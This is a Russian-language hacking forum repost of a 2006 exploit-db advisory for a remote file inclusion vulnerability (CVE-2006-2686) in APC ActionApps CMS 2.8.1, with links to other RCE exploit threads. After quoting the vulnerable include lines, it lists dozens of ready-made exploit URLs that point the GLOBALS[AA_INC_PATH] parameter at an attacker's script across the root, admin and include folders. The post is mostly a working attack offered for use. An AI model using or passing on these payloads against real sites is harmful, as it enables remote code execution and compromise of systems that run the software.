Exploit APC ActionApps CMS 2.8.1 - Remote File Inclusion

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
1829
Проверка EDB
  1. Пройдено
Автор
KACPER
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2006-2686
Дата публикации
2006-05-25
Код: 
################ DEVIL TEAM THE BEST POLISH TEAM #################
#APC ActionApps CMS (2.8.1) - Remote File Include Vulnerabilities
#Find by Kacper (Rahim).
#Greetings For ALL DEVIL TEAM members, Special DragonHeart :***
#Contact: [email protected]   or   http://www.devilteam.yum.pl
#site: http://sourceforge.net/projects/apc-aa/
##################################################################
/*
cached.php3:
... (line:35)
require_once $GLOBALS['AA_INC_PATH']."locsess.php3";
...

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

cron.php3:
... (line:47)
require_once $GLOBALS['AA_INC_PATH']."locsess.php3";
...

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

discussion.php3:
... (line:80)
require_once $GLOBALS['AA_INC_PATH']."easy_scroller.php3";
...

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

filldisc.php3:
... (line:75)
require_once $GLOBALS['AA_INC_PATH']."locsess.php3";
...

And more.......... ;-)

*/

expl:

http://www.site.com/[APC_path]/cached.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/cron.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/discussion.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/filldisc.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/filler.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/fillform.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/go.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
http://www.site.com/[APC_path]/hiercons.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/jsview.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/live_checkbox.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/offline.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/post2shtml.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/search.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/slice.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/sql_update.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/view.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]


/*
In Admin/ folder all files have:

require_once "include/config.php3";
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
include/config.php3: on line 79

require_once $GLOBALS['AA_INC_PATH']."mgettext.php3";

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

only this file: logout.php3, prev_navigation.php3, preview.php3, dont
have this verbilities

All can expl:


http://www.site.com/[APC_path]/admin/[any_file]?GLOBALS[AA_INC_PATH]=[evil_scripts]


*/
in includes/ folder:


http://www.site.com/[APC_path]/include/auth.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/constants.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/csn_util.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/discussion.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/event.class.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/event_handler.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/extauth.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/extauthnobody.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/feeding.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/fileman.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/formutil.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/item.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/item_content.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/itemfunc.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/itemview.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/javascript.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/mail.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/mailman.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/menu.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/notify.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/pagecache.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/perm_sql.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/profile.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/searchbar.class.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/searchlib.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/slicedit.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/sliceobj.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/slicewiz.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/stringexpand.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/tabledit.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/tabledit_util.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/tv_email.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/tv_misc.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/um_uedit.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/um_util.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/view.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/xml_fetch.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/xml_rssparse.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]

http://www.site.com/[APC_path]/include/zids.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]


/*
and more verbs in modules/ folder :)
*/

###################################################################
#Elo ;-)

# milw0rm.com [2006-05-25]
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit Backdrop CMS 1.27.1 - Authenticated Remote Command Execution (RCE)
Ответы
0
Просмотры
2K
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Uvdesk v1.1.3 - File Upload Remote Code Execution (RCE) (Authenticated)
Ответы
1
Просмотры
1K
Эксплойты & Уязвимости
meselem
M
Exploiter
Exploit Webutler v3.2 - Remote Code Execution (RCE)
Ответы
0
Просмотры
607
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Webedition CMS v2.9.8.8 - Remote Code Execution (RCE)
Ответы
0
Просмотры
589
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit SPIP v4.2.0 - Remote Code Execution (Unauthenticated)
Ответы
0
Просмотры
890
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)
Ответы
0
Просмотры
599
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Best POS Management System v1.0 - Unauthenticated Remote Code Execution
Ответы
0
Просмотры
585
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit SitemagicCMS 4.4.3 - Remote Code Execution (RCE)
Ответы
0
Просмотры
594
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit GetSimple CMS v3.3.16 - Remote Code Execution (RCE)
Ответы
0
Просмотры
498
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Best pos Management System v1.0 - Remote Code Execution (RCE) on File Upload
Ответы
0
Просмотры
3K
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу